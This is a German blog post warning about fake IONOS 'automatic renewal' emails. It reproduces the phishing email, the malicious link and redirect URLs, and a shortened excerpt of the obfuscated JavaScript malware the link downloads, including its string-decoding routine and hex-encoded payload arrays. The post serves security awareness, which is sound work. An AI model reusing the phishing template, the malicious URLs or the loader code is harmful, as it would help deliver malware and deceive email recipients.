Search
START TYPING AND PRESS ENTER TO SEARCH

Vorsicht, gefälschte IONOS-Mails im Umlauf: Ihre Domain und Hosting-Service(s) wurden automatisch verlängert!

Es sind wieder einmal gefälschte IONOS-Mails im Umlauf. Sollte sich in deinem Postfach eine E-Mail von IONOS mit dem Betreff “Ihre Domain und Hosting-Service(s) wurden automatisch verlängert!” landen und sich im Nachrichtentext dieser oder ein ähnlich lautender Text, wie “Herunterladen ­Rechnung ­V2024A810195.pdf” mit einem hinterlegten Link zu einem angeblichen PDF befinden, solltest du diese Nachricht sofort löschen und auf gar keinen Fall auf den in der Mail angegebenen Link klicken!

Der angegebene Link führt dich nicht zu einer Rechnung in Form eines PDF, sondern zu einer malwarebehafteten URL. Nach dem laden der URL wird ohne dein Zutun automatisch eine JavaScript-Datei (Malware) auf dein Smartphone, dein Tablet oder deinen PC heruntergeladen.

Der Code der JavaScript der Datei ist verschleiert (obfuscated), so dass auf den ersten Blick nicht erkennbar ist, welchen Schaden diese Datei auf einem Gerät anrichten kann. In meinem Beitrag “Was ist JavaScript Obfuscation bzw. JavaScript-Verschleierung?” erkläre ich diese Technik der Verschleierung ausführlich.

Bei dieser gefälschten IONOS-Mail haben sich die kriminellen Urheber in Punkto Design keine besonders große Mühe gegeben, um Ihre Opfer zu täuschen. Die Nachricht kommt sehr textlastig, ohne ein nachgeahmtes Corporate Design von IONOS daher.

In den vergangenen Tagen sind bei uns noch weitere gefälschte IONOS-Mails eingetroffen, die nicht so leicht als Scam-Mails zu identifizieren sind, wie die nachfolgende Mail:

Von: IONOS <info@irgendeinedomain.de>
Betreff: Ihre Domain und Hosting-Service(s) wurden automatisch verlängert!

Nachrichtentext:

Sehr ­geehrter ­Kunde,

Ihre ­Domain ­example.com ­und ­Hosting-Service(s) ­wurden ­automatisch ­für ­den ­Betrag ­von ­€82,88 ­verlängert.

Hosting-Paket: ­Stellar
Abrechnungszeitraum – 1 ­Jahr: ­€82,88
Domain: example.com
Rechnungsnummer: ­V2024A810195
Bestellnummer: ­10001995:28899a8e317d4028738c5ab322c9b

Herunterladen ­Sie ­die ­Rechnung, ­um ­alle ­von ­uns ­angebotenen ­Hosting-Dienste ­anzuzeigen.

Herunterladen ­Rechnung ­V2024A810195.pdf

Mit ­freundlichen ­Grüßen
Ihr ­Ionos ­Team ­ ­
Der im Nachrichtentext hinterlegte Link 
"Herunterladen ­Rechnung V2024A810195.pdf" führt zu der nachfolgenden URL:

https://rechnung-ionnos.thaiboxchile.cl/rechnung/

Auf dieser Website ist im Source-Code eine automatische Weiterleitung 
zu der URL "https://file-download.importadorachr.cl/rechnung/" hinterlegt:

<html><head><meta http-equiv="Refresh" content="0; URL=https://file-download.importadorachr.cl/rechnung/" ></head></html>

Nachdem die URL im Browser geladen wurde, wird automatisch das nachfolgende 
JavaScript als Datei auf das Gerät des Opfers heruntergeladen. 
Der Code wurde von mir gekürzt:

...
 
function elections(crocotan, boccadelanoche) {
    var trouters = onionsoup();
    return elections = function (Boccadelanoche, Crocotan) {
        Boccadelanoche = Boccadelanoche - (-0x22f6 + 0x160 + 0x207 * 0x11);
        var Trouters = trouters[Boccadelanoche];
        if (elections['SSslUm'] === undefined) {
            var Elections = function (eLections) {
                var cRocotan = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';
                var CRocotan = '', BOccadelanoche = '';
                for (var ONionsoup = -0x4d * 0x67 + 0x1e27 + 0xd4, TRouters, ELections, onIonsoup = -0x238d * 0x1 + 0xf70 + 0x10f * 0x13; ELections = eLections['charAt'](onIonsoup++); ~ELections && (TRouters = ONionsoup % (-0x2705 + -0x1 * -0x1d86 + 0x983) ? TRouters * (0x67e * 0x2 + 0x16 * -0x171 + 0x12fa) + ELections : ELections, ONionsoup++ % (-0x16f * -0x2 + 0x221d + -0x24f7)) ? CRocotan += String['fromCharCode'](0x73 * -0x44 + -0x14dd + -0x2b * -0x138 & TRouters >> (-(-0x1d7b * -0x1 + -0xf40 + -0xe39 * 0x1) * ONionsoup & 0x1018 + 0x19cc + 0x1 * -0x29de)) : 0x20f2 * -0x1 + 0x39f + 0x1d53 * 0x1) {
                    ELections = cRocotan['indexOf'](ELections);
                }
                for (var trOuters = 0x856 + 0x347 * 0x6 + -0x1c00, boCcadelanoche = CRocotan['length']; trOuters < boCcadelanoche; trOuters++) {
                    BOccadelanoche += '%' + ('00' + CRocotan['charCodeAt'](trOuters)['toString'](0xd * 0x56 + -0x1ecb + 0x1a7d))['slice'](-(0x91b + -0xe86 + -0x3 * -0x1cf));
                }
                return decodeURIComponent(BOccadelanoche);
            };
            var tRouters = function (elEctions, crOcotan) {
                var CrOcotan = [], OnIonsoup = 0x1a42 + -0x177a + -0x2c8, BoCcadelanoche, ElEctions = '';
                elEctions = Elections(elEctions);
                var TrOuters;
                for (TrOuters = -0x2 * -0x64 + -0x105 * 0x3 + 0x247 * 0x1; TrOuters < -0x1 * -0x74f + 0xf65 + -0x15b4; TrOuters++) {
                    CrOcotan[TrOuters] = TrOuters;
                }
                for (TrOuters = -0x1df6 + 0x81e + -0x18 * -0xe9; TrOuters < 0x1284 + -0x2 * -0xb92 + 0x4 * -0xa2a; TrOuters++) {
                    OnIonsoup = (OnIonsoup + CrOcotan[TrOuters] + crOcotan['charCodeAt'](TrOuters % crOcotan['length'])) % (-0x11eb + 0xd1a * -0x2 + 0x2d1f), BoCcadelanoche = CrOcotan[TrOuters], CrOcotan[TrOuters] = CrOcotan[OnIonsoup], CrOcotan[OnIonsoup] = BoCcadelanoche;
                }
                TrOuters = -0xb3 * 0xe + 0x2 * -0x79a + -0x1 * -0x18fe, OnIonsoup = -0x1542 + -0xf9f + 0x24e1;
                for (var bOCcadelanoche = 0x1fff + -0x132f + -0xcd0; bOCcadelanoche < elEctions['length']; bOCcadelanoche++) {
                    TrOuters = (TrOuters + (0x163a * -0x1 + 0x58e + -0x10ad * -0x1)) % (0x4d * 0xa + -0x11 * -0x1a9 + -0x1e3b), OnIonsoup = (OnIonsoup + CrOcotan[TrOuters]) % (0x1eba + -0x1504 + 0x1be * -0x5), BoCcadelanoche = CrOcotan[TrOuters], CrOcotan[TrOuters] = CrOcotan[OnIonsoup], CrOcotan[OnIonsoup] = BoCcadelanoche, ElEctions += String['fromCharCode'](elEctions['charCodeAt'](bOCcadelanoche) ^ CrOcotan[(CrOcotan[TrOuters] + CrOcotan[OnIonsoup]) % (-0x5 * -0x4ab + 0x661 * -0x4 + 0x32d)]);
                }
                return ElEctions;
            };
            elections['pyCSPj'] = tRouters, crocotan = arguments, elections['SSslUm'] = !![];
        }
        var Onionsoup = trouters[-0x22d1 * 0x1 + -0xf4a + 0x65 * 0x7f], oNionsoup = Boccadelanoche + Onionsoup, bOccadelanoche = crocotan[oNionsoup];
        return !bOccadelanoche ? (elections['OuJVyc'] === undefined && (elections['OuJVyc'] = !![]), Trouters = elections['pyCSPj'](Trouters, Crocotan), crocotan[oNionsoup] = Trouters) : Trouters = bOccadelanoche, Trouters;
    }, elections(crocotan, boccadelanoche);
}
function onionsoup() {
    var oNionsoup = [
        'WQtdKCoraSkLFSo3cNShiHNcTxddRSkxWRldOI1FW4ldMXHda1xcLdlcI3rLvmoz',
        'ASkQW5HiW6uvlCk/gwZdSZyOW4C',
        'W4BdSwhcKSk8ggRdNYjtvZtcJaK',
        'h8ouWOddNW'
    ];
    onionsoup = function () {
        return oNionsoup;
    };
    return onionsoup();
}
function crocotan(boccadelanoche, trouters, Elections, Crocotan, Onionsoup) {
    var Boccadelanoche = { Trouters: '0x3e7' };
    return elections(Onionsoup - -Boccadelanoche.Trouters, boccadelanoche);
}
function ZHAMPTONforeignundertheFALKLAND(Zkingdomsthemakethanspiritedjudgment) {
    if (typeof Zkingdomsthemakethanspiritedjudgment !== 'string') {
        throw new Error('check input');
    }

    if (Zkingdomsthemakethanspiritedjudgment.length % 2 !== 0) {
        throw new Error('printing');
    }

    var Zhaspopularbutthanhistorysuchanother = [];
    for (var ZChurchherBIRTHsuch = 0; ZChurchherBIRTHsuch < Zkingdomsthemakethanspiritedjudgment.length; ZChurchherBIRTHsuch += 2) {
        var ZMELVILLEthandisesteemed_?lite_ = Zkingdomsthemakethanspiritedjudgment.substr(ZChurchherBIRTHsuch, 2);
        var ZhasdrewMessrsconcernDINGINGScotNothing = 0;

        for (var j = 0; j < ZMELVILLEthandisesteemed_?lite_.length; j++) {
            ZhasdrewMessrsconcernDINGINGScotNothing <<= 4;
            var ZareclaimsboundChurchfrom = ZMELVILLEthandisesteemed_?lite_.charAt(j);
            if (ZareclaimsboundChurchfrom >= '0' && ZareclaimsboundChurchfrom <= '9') {
                ZhasdrewMessrsconcernDINGINGScotNothing |= (ZareclaimsboundChurchfrom.charCodeAt(0) - '0'.charCodeAt(0));
            } else if (ZareclaimsboundChurchfrom >= 'A' && ZareclaimsboundChurchfrom <= 'F') {
                ZhasdrewMessrsconcernDINGINGScotNothing |= (ZareclaimsboundChurchfrom.charCodeAt(0) - 'A'.charCodeAt(0) + 10);
            } else if (ZareclaimsboundChurchfrom >= 'a' && ZareclaimsboundChurchfrom <= 'f') {
                ZhasdrewMessrsconcernDINGINGScotNothing |= (ZareclaimsboundChurchfrom.charCodeAt(0) - 'a'.charCodeAt(0) + 10);
            } else {
                throw new Error('document ready');
            }
        }
     Zhaspopularbutthanhistorysuchanother.push(ZhasdrewMessrsconcernDINGINGScotNothing);
    }

    return Zhaspopularbutthanhistorysuchanother;
}
var ZLatinwastheprintingconcerningfollowsonce = ZHAMPTONforeignundertheFALKLAND('1B776D17443A5F3E120C0E202A1974761B1763595324121A4A120B58541F54111306144B6B14666F4137064C2624360C521C02197D040F531B03302B053D3D57442B5F062A766E035A0663796A09507F4A06786B00657B0B5940754348455B4D0A4E740C76585E4353547A6F785C74477D04464770430A4169727C66414D78486A0B7A5E4E544A186A6C02796D4557016A435841760175794E6505765577077B4251006276590B57764860400C4E44786571047D5664576B54610363546F767F60015B45446C475C5D044B794D5C7C0F585B6C6276142F3509100F295E1175597E23272C3F33406E7F330446423A061E5B5703147C79171306281E210A1B1D3F47670A122229101D352C345F353F035A5F2E3724162D3E706C1F2C480825101D0E2A370F49100B56682B0E282859213E1E22671E4A113B1412080509544E671D1C253134292D573212304140373E3525145F39382179675F4C035D342C5944047A18151909381B584526552C51592708234E75095002595876002546360F26053B20252D38114D735E14132B371553352968195616363625303D3C292A3C045267315B110348310B1A035F02240C2452432A1A1A13331832255D504D0B5C0B52672D33070503303E5300582A7D74241850421C550F1A5F1B1E0528441724206D637010201B08082E023E196D6B4F7E615C0B2731282B1F67756A70797F535055605C5951001163693C447B71311E360925686B1E211D231977094B211A091F201A245F1F6A');
var Zchapter_?lite_Presbyterianwhichmere = ZHAMPTONforeignundertheFALKLAND('7757496D374335496A6B6D54466B49516E654479684A776D67736731356C7461616367384B774247654D75354C534E6B31686E6B546834776B66474F67444E38314C326D444B4630633754555930624E66354158384948326875597071776A61397745395A6B6771637849574E6B58744532746B437A39734541455476614B715833566D766279345954344C41766F37586F6B784439594A7757355A664E35436E6238554F75386E45794C7334797354564836487A576E59654D305A66595A4C593269697755746D7137734F78704F376E6D455952784D51796A7A423369487159415543514B6742585461326F596B7A373277335542336B7152744D657273497A437A77554D72644643413858546D6139414541774E565848745638615468716B53436C697965764C53795242354E5770544E656E73566D71636F6C30734376665558455141324B66537A645A44574D6639534846444332366135464A33346351437671684A46706144385532324D6D4763463161347063526648304577426C59574D5753707057336E7143457339454E5339727844435657545A4242506B6F4357366770305562787437784F6D596967446D777854795655313938506E566F43434172766459583868344546504875343066376E793073696C4D7930564C4A5854754C6D727843704F78505A745045745044594959424F4C53494B526A686D577572766536484E44635259416C537A5648466B5278413953673954696E7646714C337043');
var ZinteresthazardsstrugglesandPresbyterian = '';
for (var ZChurchherBIRTHsuch = 0; ZChurchherBIRTHsuch < ZLatinwastheprintingconcerningfollowsonce.length; ZChurchherBIRTHsuch++) {
    ZinteresthazardsstrugglesandPresbyterian += String.fromCharCode(ZLatinwastheprintingconcerningfollowsonce[ZChurchherBIRTHsuch] ^ Zchapter_?lite_Presbyterianwhichmere[ZChurchherBIRTHsuch % Zchapter_?lite_Presbyterianwhichmere.length]);
}
var vrfindmshpwkjctq = [
    crocotan('0!@&', -'0x308', -'0x304', -'0x305', -'0x306'),
    crocotan('!i9a', -'0x307', -'0x305', -'0x307', -'0x305'),
    crocotan('^5tZ', -'0x304', -'0x303', -'0x304', -'0x304'),
    ZinteresthazardsstrugglesandPresbyterian,
    crocotan('QkIF', -'0x305', -'0x301', -'0x302', -'0x303')
];

Heike Vollmers

Heike Vollmers – Seit 1998 selbstständige Unternehmerin, Autorin/Onlinejournalistin, Gründerin des teufelswerk, Inhaberin und Gesellschafterin der Münnecke & Vollmers GbR, Ethical Hacker, Spezialistin für Cybersecurity, Social Engineering, Security Awareness & Datenschutz. Mehr erfahren

, , , , , , , , , , , , , , , , ,

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert